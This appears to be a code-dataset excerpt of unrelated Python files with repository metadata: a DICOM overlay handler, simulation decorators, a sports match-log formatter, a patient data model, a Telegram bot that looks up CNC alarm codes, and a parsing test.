| Element | Required or |
+-------------+---------------------------+------+ optional |
| Tag | Keyword | Type | |
+=============+===========================+======+=============+
| (60xx,0010) | OverlayRows | 1 | Required |
+-------------+---------------------------+------+-------------+
| (60xx,0011) | OverlayColumns | 1 | Required |
+-------------+---------------------------+------+-------------+
| (60xx,0015) | NumberOfFramesInOverlay | 1 | Required |
+-------------+---------------------------+------+-------------+
Parameters
----------
elem : dict
A :class:`dict` with the keys as the element keywords and values the
corresponding element values (such as ``{'OverlayRows': 512, ...}``)
for the elements listed in the table above.
unit : str, optional
If ``'bytes'`` then returns the expected length of the *Overlay Data*
in whole bytes and NOT including an odd length trailing NULL padding
byte. If ``'pixels'`` then returns the expected length of the *Overlay
Data* in terms of the total number of pixels (default ``'bytes'``).
Returns
-------
int
The expected length of the *Overlay Data* in either whole bytes or
pixels, excluding the NULL trailing padding byte for odd length data.
"""
length: int = elem['OverlayRows'] * elem['OverlayColumns']
length *= elem['NumberOfFramesInOverlay']
if unit == 'pixels':
return length
# Determine the nearest whole number of bytes needed to contain
# 1-bit pixel data. e.g. 10 x 10 1-bit pixels is 100 bits, which
# are packed into 12.5 -> 13 bytes
return length // 8 + (length % 8 > 0)
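# Worked example (values chosen for illustration, not from a real dataset):
# a 10 x 10 single-frame overlay holds 100 1-bit pixels, so
# get_expected_length({'OverlayRows': 10, 'OverlayColumns': 10,
#                      'NumberOfFramesInOverlay': 1}) returns 100 // 8 + 1 == 13 bytes,
# and 100 when called with unit='pixels'.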
def reshape_overlay_array(
elem: Dict[str, Any], arr: "np.ndarray"
) -> "np.ndarray":
"""Return a reshaped :class:`numpy.ndarray` `arr`.
.. versionadded:: 1.4
+------------------------------------------------+--------------+
| Element | Supported |
+-------------+---------------------------+------+ values |
| Tag | Keyword | Type | |
+=============+===========================+======+==============+
| (60xx,0010) | OverlayRows | 1 | N > 0 |
+-------------+---------------------------+------+--------------+
| (60xx,0011) | OverlayColumns | 1 | N > 0 |
+-------------+---------------------------+------+--------------+
| (60xx,0015) | NumberOfFramesInOverlay | 1 | N > 0 |
+-------------+---------------------------+------+--------------+
Parameters
----------
elem : dict
A :class:`dict` with the keys as the element keywords and values the
corresponding element values (such as ``{'OverlayRows': 512, ...}``)
for the elements listed in the table above.
arr : numpy.ndarray
A 1D array containing the overlay data.
Returns
-------
numpy.ndarray
A reshaped array containing the overlay data. The shape of the array
depends on the contents of the dataset:
* For single frame data (rows, columns)
* For multi-frame data (frames, rows, columns)
References
----------
* DICOM Standard, Part 3, Sections :dcm:`C.9.2<part03/sect_C.9.2.html>`
and :dcm:`C.9.3<part03/sect_C.9.3.html>`
* DICOM Standard, Part 5, :dcm:`Section 8.2<part05/sect_8.2.html>`
"""
if not HAVE_NP:
raise ImportError("Numpy is required to reshape the overlay array.")
nr_frames = elem['NumberOfFramesInOverlay']
nr_rows = elem['OverlayRows']
nr_columns = elem['OverlayColumns']
if nr_frames < 1:
raise ValueError(
f"Unable to reshape the overlay array as a value of {nr_frames} "
"for (60xx,0015) 'Number of Frames in Overlay' is invalid."
)
if nr_frames > 1:
return arr.reshape(nr_frames, nr_rows, nr_columns)
return arr.reshape(nr_rows, nr_columns)
def get_overlay_array(ds: "Dataset", group: int) -> "np.ndarray":
"""Return a :class:`numpy.ndarray` of the *Overlay Data*.
.. versionadded:: 1.4
Parameters
----------
ds : Dataset
The :class:`Dataset` containing an Overlay Plane module and the
*Overlay Data* to be converted.
group : int
The group part of the *Overlay Data* element tag, e.g. ``0x6000``,
``0x6010``, etc. Must be between 0x6000 and 0x60FF.
Returns
-------
np.ndarray
The contents of (`group`,3000) *Overlay Data* as an array.
Raises
------
AttributeError
If `ds` is missing a required element.
ValueError
If the actual length of the overlay data doesn't match the expected
length.
"""
if not HAVE_NP:
raise ImportError("The overlay data handler requires numpy")
# Check required elements
elem = {
'OverlayData': ds.get((group, 0x3000), None),
'OverlayBitsAllocated': ds.get((group, 0x0100), None),
'OverlayRows': ds.get((group, 0x0010), None),
'OverlayColumns': ds.get((group, 0x0011), None),
}
missing = [kk for kk, vv in elem.items() if vv is None]
if missing:
raise AttributeError(
"Unable to convert the overlay data as the following required "
f"elements are missing from the dataset: {', '.join(missing)}"
)
# Grab the element values
elem_values = {kk: vv.value for kk, vv in elem.items()}
# Add in if not present
nr_frames: Optional["DataElement"] = ds.get((group, 0x0015), None)
if nr_frames is None:
elem_values['NumberOfFramesInOverlay'] = 1
else:
elem_values['NumberOfFramesInOverlay'] = nr_frames.value
# Calculate the expected length of the pixel data (in bytes)
# Note: this does NOT include the trailing null byte for odd length data
expected_len = get_expected_length(elem_values)
# Check that the actual length of the pixel data is as expected
actual_length = len(cast(bytes, elem_values['OverlayData']))
# Correct for the trailing NULL byte padding for odd length data
padded_expected_len = expected_len + expected_len % 2
if actual_length < padded_expected_len:
if actual_length == expected_len:
warnings.warn(
"The overlay data length is odd and misses a padding byte."
)
else:
raise ValueError(
"The length of the overlay data in the dataset "
f"({actual_length} bytes) doesn't match the expected length "
f"({padded_expected_len} bytes). The dataset may be corrupted "
"or there may be an issue with the overlay data handler."
)
elif actual_length > padded_expected_len:
# PS 3.5, Section 8.1.1
warnings.warn(
f"The length of the overlay data in the dataset ({actual_length} "
"bytes) indicates it contains excess padding. "
f"{actual_length - expected_len} bytes will be removed "
"from the end of the data"
)
# Unpack the pixel data into a 1D ndarray, skipping any trailing padding
nr_pixels = get_expected_length(elem_values, unit='pixels')
arr = unpack_bits(elem_values['OverlayData'])[:nr_pixels]
return reshape_overlay_array(elem_values, arr)
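# Minimal usage sketch (the file path is hypothetical; requires a dataset that
# actually contains a (6000,3000) Overlay Data element):
#
#   from pydicom import dcmread
#   ds = dcmread("overlay_example.dcm")
#   overlay = get_overlay_array(ds, 0x6000)
#   print(overlay.shape, overlay.dtype)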
| 9,931 |
PyHEADTAIL/general/decorators.py
|
fsoubelet/PyHEADTAIL
| 0 |
2172228
|
'''
@authors: <NAME>
@date: 02/10/2014
Provide useful decorators for PyHEADTAIL.
'''
import warnings
from functools import wraps
from PyHEADTAIL.gpu import gpu_utils
def deprecated(message):
'''Deprecation warning as described in warnings documentation.
'''
def deprecated_decorator(func):
@wraps(func)
def deprecated_wrapper(*args, **kwargs):
if func.__name__ == "__init__":
                name = type(args[0]).__name__
else:
name = func.__name__
warnings.simplefilter('always', DeprecationWarning)
warnings.warn('\n\n*** DEPRECATED: "{:s}" will be replaced in a future '
'PyHEADTAIL release!'.format(name),
category=DeprecationWarning, stacklevel=2)
warnings.simplefilter('default', DeprecationWarning)
print(message)
return func(*args, **kwargs)
return deprecated_wrapper
return deprecated_decorator
def memoize(function):
'''Memoizes the output of a function for given arguments (no keyword arguments)
and returns the correspondingly saved value after the first evaluation.
'''
store = {}
@wraps(function)
def evaluate(*args):
        signature = args
if signature not in store:
store[signature] = function(*args)
return store[signature]
return evaluate
def synchronize_gpu_streams_before(func):
'''
Use this decorator if you need the results of all the streams
synchronized before this function is called
'''
def sync_before_wrap(*args, **kwargs):
if gpu_utils.use_streams:
for stream in gpu_utils.streams:
stream.synchronize()
return func(*args, **kwargs)
return sync_before_wrap
def synchronize_gpu_streams_after(func):
'''
Use this decorator if you need the results of all the streams
synchronized after this function is called
'''
def sync_after_wrap(*args, **kwargs):
res = func(*args, **kwargs)
if gpu_utils.use_streams:
for stream in gpu_utils.streams:
stream.synchronize()
return res
return sync_after_wrap
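# Minimal usage sketch for the decorators above (function names are illustrative only):
#
#   @deprecated('Use new_track() instead.')
#   def old_track(bunch):
#       ...
#
#   @memoize
#   def twiss_parameter(n):
#       return expensive_computation(n)   # evaluated once per distinct n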
| 2,222 |
matchreporter/collect/gaamatchformatter.py
|
moynihanrory/matchreporter
| 0 |
2170936
|
from matchreporter.constants import FIRST_HALF_START, FIRST_HALF_END, SECOND_HALF_START, SECOND_HALF_END, FORMAT_ROW_TIME, \
FORMAT_ROW_HALF, FORMAT_ROW_SECTOR, FORMAT_ROW_KPI, FORMAT_ROW_TEAM, FORMAT_ROW_LOCATION, FORMAT_ROW_PLAYER, \
LOCATION_TAG, EVENT_ENDING
from matchreporter.helpers.pitchgrid import Grid
from matchreporter.helpers.stringhelper import strip_and_convert_half_to_int, strip_and_convert_time_to_int
from matchreporter.helpers.timesector import get_time_sector
FORMAT_ROW_ORIG_LOCATION = 'original_location'
FORMAT_ROW_L_ROW = 'lRow'
FORMAT_ROW_L_COLUMN = 'lColumn'
FORMAT_ROW_EVENT = 'event'
FORMAT_ROW_RAWTIME = 'rawtime'
def clean_and_format_data(mobile_app_output):
first_half_on = False
second_half_on = False
is_match_on = False
grid = Grid()
formatted_lines = []
for _, line in enumerate(mobile_app_output):
if is_match_on is not True:
if line.lower().startswith(FIRST_HALF_START.lower()):
first_half_on = True
is_match_on = True
continue
if is_match_on is True and first_half_on is True:
if line.lower().startswith(FIRST_HALF_END.lower()):
first_half_on = False
continue
if is_match_on is True and first_half_on is False and second_half_on is False:
if line.lower().startswith(SECOND_HALF_START.lower()):
second_half_on = True
continue
if is_match_on is True and first_half_on is False and second_half_on is True:
if line.lower().startswith(SECOND_HALF_END.lower()):
second_half_on = False
is_match_on = False
continue
if (is_match_on and (first_half_on or second_half_on)):
re_formatted_line = format_line(line, grid)
formatted_lines.insert(len(formatted_lines), re_formatted_line)
return formatted_lines
def format_line(line, grid):
line_chunks = line.split()
total_chunks = len(line_chunks)
time = strip_and_convert_time_to_int(line_chunks[0])
half = strip_and_convert_half_to_int(line_chunks[1])
team = line_chunks[3]
location, location_end_index = extract_location(line_chunks, total_chunks)
pitch_location = grid.get_pitch_sector(location)
event, event_end_index = extract_event(line_chunks, location_end_index)
player = extract_player(line_chunks, event_end_index, location_end_index)
sector = get_time_sector(time, half)
l_column = None
    if pitch_location is not None and pitch_location != 'UNK':
l_column = pitch_location[0:1]
l_row = ''
    if pitch_location is not None and len(pitch_location) > 0 and pitch_location != 'UNK':
l_row = pitch_location[-1]
row = {FORMAT_ROW_TIME: time,
FORMAT_ROW_RAWTIME: time,
FORMAT_ROW_HALF: half,
FORMAT_ROW_SECTOR: sector,
FORMAT_ROW_TEAM: team,
FORMAT_ROW_KPI: event,
FORMAT_ROW_EVENT: event,
FORMAT_ROW_PLAYER: player,
FORMAT_ROW_LOCATION: pitch_location,
FORMAT_ROW_L_COLUMN: l_column,
FORMAT_ROW_L_ROW: l_row}
return row
def extract_location(line_chunks, total_chunks):
if LOCATION_TAG in line_chunks:
location = line_chunks[total_chunks - 1]
else:
return None, total_chunks
location_end_index = total_chunks - 1
if location is not None:
location_end_index = location_end_index - 1
return location, location_end_index
def extract_event(line_chunks, event_end_index):
player_string_start = None
event = line_chunks[4]
for i in range(5, event_end_index):
event = event + ' ' + line_chunks[i]
if line_chunks[i].lower() in EVENT_ENDING:
player_string_start = i + 1
break
return event, player_string_start
def extract_player(line_chunks, player_start_index, player_end_index):
player = ''
if player_start_index is None or player_end_index is None:
return player
for i in range(player_start_index, player_end_index):
player = player + ' ' + line_chunks[i]
return player
| 4,258 |
covews/data_access/data_model/patient.py
|
d909b/CovEWS
| 16 |
2173077
|
"""
Copyright (C) 2020 <NAME>, <NAME> Ltd
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions
of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
class Patient(object):
GENDER_MALE = 0
GENDER_FEMALE = 1
RACE_UNKNOWN_OTHER = 0
RACE_AFRICAN_AMERICAN = 1
RACE_CAUCASIAN = 2
RACE_ASIAN = 3
ETHNICITY_OTHER = 0
ETHNICITY_HISPANIC = 1
def __init__(self, patient_id, birth_year, gender, date_of_death, region, covid_status, covid_tests=None,
admissions=None, icu_admissions=None, intubations=None, diagnoses=None, observations=None, dexa=None,
race=None, ethnicity=None):
self.patient_id = patient_id
self.age = 2020 - int(birth_year) if birth_year is not None else None
self.gender = gender
self.date_of_death = date_of_death
self.region = region
self.covid_status = covid_status
self.covid_tests = covid_tests
self.icu_admissions = icu_admissions
self.hospital_admissions = admissions
self.intubations = intubations
self.dexa = dexa
self.diagnoses = diagnoses
self.observations = observations
self.race = race
self.ethnicity = ethnicity
class Procedure(object):
def __init__(self, code, timestamp):
self.code = code
self.timestamp = timestamp
def __repr__(self):
return 'code={:}, time={:})'.format(self.code, self.timestamp)
class Diagnosis(object):
def __init__(self, code, timestamp, coding_scheme="icd10"):
self.code = code
self.timestamp = timestamp
self.coding_scheme = coding_scheme
def __repr__(self):
return 'code={:}, time={:})'.format(self.code, self.timestamp)
class Visit(object):
def __init__(self, area_name, timestamp):
self.area_name = area_name
self.timestamp = timestamp
def __repr__(self):
return 'area_name={:}, time={:})'.format(self.area_name, self.timestamp)
class Observation(object):
SMOKE_NEVER = 0
SMOKE_PREVIOUSLY = 1
SMOKE_CURRENTLY = 2
SMOKE_UNKNOWN = 3
def __init__(self, obs_type, value, unit, timestamp):
self.type = obs_type
self.value = value
self.unit = unit
self.timestamp = timestamp
def __repr__(self):
return 'type={:}, value={:}, unit={:}, time={:}'.format(self.type, self.value, self.unit, self.timestamp)
class LabTest(object):
TEST_NEGATIVE = 0
TEST_POSITIVE = 1
TEST_UNKNOWN = 2
def __init__(self, code, collected_timestamp, test_value, test_unit=None, result_timestamp=None):
self.code = code
self.timestamp = collected_timestamp
self.test_value = test_value
self.test_unit = test_unit
self.result_timestamp = result_timestamp
@property
def value(self):
return self.test_value
def __repr__(self):
return 'code={:}, time={:}, value={:})'.format(self.code, self.timestamp, self.test_value)
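# Minimal construction sketch (all field values below are made up for illustration):
#
#   patient = Patient(
#       patient_id="p-0001",
#       birth_year=1957,
#       gender=Patient.GENDER_FEMALE,
#       date_of_death=None,
#       region="northeast",
#       covid_status=LabTest.TEST_POSITIVE,
#       observations=[Observation("temperature", 38.2, "C", "2020-04-01")],
#   )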
| 3,921 |
Cad_Especies_Animais/src/model/familia.py
|
andersonmarques/programacao_2_ufra
| 0 |
2172794
|
from model.ordem import Ordem
class Familia:
def __init__(self, nome = None, ordem = None) -> None:
self.nome = nome
self.ordem = ordem
self.lista_generos = None
def __str__(self):
return f'Familia: {self.__nome}'
@property
def nome(self):
return self.__nome
@nome.setter
def nome(self, value):
self.__nome = value
@property
    def ordem(self) -> Ordem:  # indicates that an Ordem object is returned
return self.__ordem
@ordem.setter
def ordem(self, value):
self.__ordem = value
@property
def lista_generos(self):
return self.__generos
@lista_generos.setter
    def lista_generos(self, value):
        # Start with an empty list when no value is provided, otherwise store the given list
        self.__generos = [] if value is None else value
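# Minimal usage sketch (the names below are illustrative, not from the project):
#   felidae = Familia(nome="Felidae")
#   felidae.lista_generos = ["Panthera", "Felis"]
#   print(felidae)                # -> Familia: Felidae
#   print(felidae.lista_generos)  # -> ['Panthera', 'Felis']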
| 916 |
BOT.py
|
RenanAlmeidaSilva/Alarme-App-DAsl
| 0 |
2173145
|
import logging
import json
from aiogram import Bot, Dispatcher, executor, types
API_TOKEN = '<KEY>'
# Configure logging
logging.basicConfig(level=logging.DEBUG)
# Initialize bot and dispatcher
bot = Bot(token=API_TOKEN)
dp = Dispatcher(bot)
with open('alarmes.json', 'r') as f:
alarmes = json.load(f)
@dp.message_handler(commands=['info'])
async def send_welcome(message: types.Message):
await message.reply("Hi! I'm Alarmes828DBot!\nPowered by: \nDev. <NAME>. (Estagiário Developer) \nDev. <NAME>. (Estagiário Developer)\n")
@dp.message_handler(commands=['start'])
async def send_welcome(message: types.Message):
with open('user.txt') as file:
userList = file.read()
user = userList.split('\n')
textomsg1 = ''
if message['chat']['username']:
textomsg1 += message["chat"]["username"]
with open('logs.log', 'a') as arquivo:
arquivo.write('\n' + message["chat"]["username"] + '\n\n')
if textomsg1 in user:
await message.answer('Olá ' + message['chat'][
'first_name'] + ', eu sou o Bot para o alarme 840Dsl, criado para encontrar as informações do seu erro.\n'
'Você deve me fornecer um valor para pesquisa.')
else:
await message.answer("Olá, eu sou o Bot para o alarme 840Dsl, criado para encontrar as informações do seu erro.\n"
"No momento você não possui permissão para acessar as informações internas.\n"
"Entre em contato com os desenvolvedores.\n"
"Para mais informações dos meu criadores digite '/info'")
else:
await message.answer('Olá ' + message['chat'][
'first_name'] + ', no momento não encontrei seu username. Você deve verifica-lo nas configurações do Telegram.')
@dp.message_handler()
async def echo(message: types.Message):
segundos = message['date']
with open('logs.log', 'a') as arquivo:
arquivo.write(segundos.__str__())
with open('user.txt') as file:
userList = file.read()
#print(userList)
user = userList.split('\n')
#print(user)
textomsg = ''
if message["chat"]["username"]:
textomsg += message["chat"]["username"]
with open('logs.log', 'a') as arquivo:
arquivo.write('\n'+message["chat"]["username"]+'\n\n')
else:
await message.answer("Você não possui um Username. Logo, deverá ir em suas configurações e nomea-lo.")
if message.text == '27001':
await message.answer('Mensagem muito longa, por favor verifique o manual:\n'
'https://www.autservice.com.br/admin/assets/repositorio/292d4f09b8fe329bf5c7bbb922b6d3bc.pdf#page=481')
if message.text == '27033':
await message.answer('Mensagem muito longa, por favor verifique o manual:\n'
'https://www.autservice.com.br/admin/assets/repositorio/292d4f09b8fe329bf5c7bbb922b6d3bc.pdf#page=496')
elif textomsg in user:
entradas = ['oi', 'olá', 'ola', 'oie', 'roi']
txt = ''
for alarme in alarmes:
if alarme['numero'] == message.text:
if alarme['titulo']:
txt += f'TÍTULO: {alarme["titulo"]}\n'
if alarme['Explanation']:
txt += f'\nEXPLANATION:\n{alarme["Explanation"]}\n'
if alarme['reaction']:
txt += f'\nREACTION:\n{alarme["reaction"]}\n'
if alarme['Programm']:
txt += f'PROGRAMM CONTINUATION:{alarme["Programm"]}\n'
if alarme['parameters']:
txt += f'PARAMETERS:\n{alarme["parameters"]}\n'
if alarme['Remedy']:
txt += f'REMEDY:\n{alarme["Remedy"]}\n'
if alarme['messagevalue']:
txt += f'MESSAGE VALUE:\n{alarme["messagevalue"]}\n'
if alarme['cause']:
txt += f'CAUSE:\n{alarme["cause"]}\n'
if alarme['driveobject']:
txt += f'DRIVE OBJECT:\n{alarme["driveobject"]}\n'
if alarme['Acknowledge']:
txt += f'ACKNOWLEDGE:\n{alarme["Acknowledge"]}\n'
if txt != '':
await message.answer(txt)
elif message.text.lower() in (entradas):
await message.answer('Olá ' + message['chat'][
'first_name'] + ', eu sou o Bot para o alarme 840Dsl, criado para encontrar as informações do seu erro.\n'
'Você deve me fornecer um valor para pesquisa.')
else:
erro = "Você deve fornecer um valor válido."
await message.answer(erro)
'''if message.text == '27001':
Explanation = [x for x in alarmes if x['numero'] == '27001'][0]['Explanation']
await message.answer(Explanation)
for cont in range(1):
divisor = []
if txt.find('Divisor..//') >= 0:
divisor(cont) += x.split('Divisor..//')[1].split('Divisor..//')[0]
await message.answer(divisor)'''
else:
await message.answer("Olá, eu sou o Bot para o alarme 828D, criado para encontrar as informações do seu erro.\n"
"No momento você não possui permissão para acessar as informações internas.\n"
"Entre em contato com os desenvolvedores.\n"
"Para mais informações dos meu criadores digite '/info'")
if __name__ == '__main__':
executor.start_polling(dp, skip_updates=True)
| 5,812 |
test/test_parse.py
|
ebegoli/SynthNotes
| 11 |
2172779
|
import os
import shutil
import subprocess
import pandas as pd
import pyarrow as pa
import pyarrow.parquet as pq
def test_parse_execution():
testdir = os.path.dirname(__file__)
#If we don't remove leftovers, running parse will just vomit file copies and create a second copy of the dataframe.
if os.path.isdir(testdir+'/parsed'):
shutil.rmtree(testdir+'/parsed')
cargs = ['synthnotes','parse','--xml-dir',testdir+'/xml/','--output',testdir+'/parsed/','--seed','0']
subprocess.call(cargs)
dirs = os.listdir(testdir+"/parsed/")
assert len(dirs) == 5
def test_parse_output():
testdir = os.path.dirname(__file__)
test_mentions = pq.read_table(f'{testdir}/parsed/mentions').to_pandas()
verify_mentions = pq.read_table(f'{testdir}/verify/parsed/mentions').to_pandas()
test_mentions.drop(['id','sent_id'],axis=1, inplace=True)
verify_mentions.drop(['id','sent_id'],axis=1, inplace=True)
assert test_mentions.equals(verify_mentions)
test_predicates = pq.read_table(f'{testdir}/parsed/predicates').to_pandas()
verify_predicates = pq.read_table(f'{testdir}/verify/parsed/predicates').to_pandas()
test_predicates.drop(['id','sent_id'],axis=1, inplace=True)
verify_predicates.drop(['id','sent_id'],axis=1, inplace=True)
assert test_predicates.equals(verify_predicates)
test_sentences = pq.read_table(f'{testdir}/parsed/sentences').to_pandas()
verify_sentences = pq.read_table(f'{testdir}/verify/parsed/sentences').to_pandas()
test_sentences.drop(['id'],axis=1, inplace=True)
verify_sentences.drop(['id'],axis=1, inplace=True)
assert test_sentences.equals(verify_sentences)
test_tokens = pq.read_table(f'{testdir}/parsed/tokens').to_pandas()
verify_tokens = pq.read_table(f'{testdir}/verify/parsed/tokens').to_pandas()
test_tokens.drop(['id','sent_id'],axis=1, inplace=True)
verify_tokens.drop(['id','sent_id'],axis=1, inplace=True)
assert test_tokens.equals(verify_tokens)
test_umls = pq.read_table(f'{testdir}/parsed/umls_concepts').to_pandas()
verify_umls = pq.read_table(f'{testdir}/verify/parsed/umls_concepts').to_pandas()
test_umls.drop(['id'],axis=1, inplace=True)
verify_umls.drop(['id'],axis=1, inplace=True)
assert test_umls.equals(verify_umls)
#for dirname in dirs:
# check that the contents are actually right
#exit()
# dirhash = subprocess.check_output(["sha1sum",dirname+"/* | sha1sum"])
# verifyhash = subprocess.check_output(["sha1sum", testdir+"/"+os.path.relpath(dirname,testdir+"/parsed")+"/* | sha1sum"])
# assert dirhash == verifyhash
| 2,629 |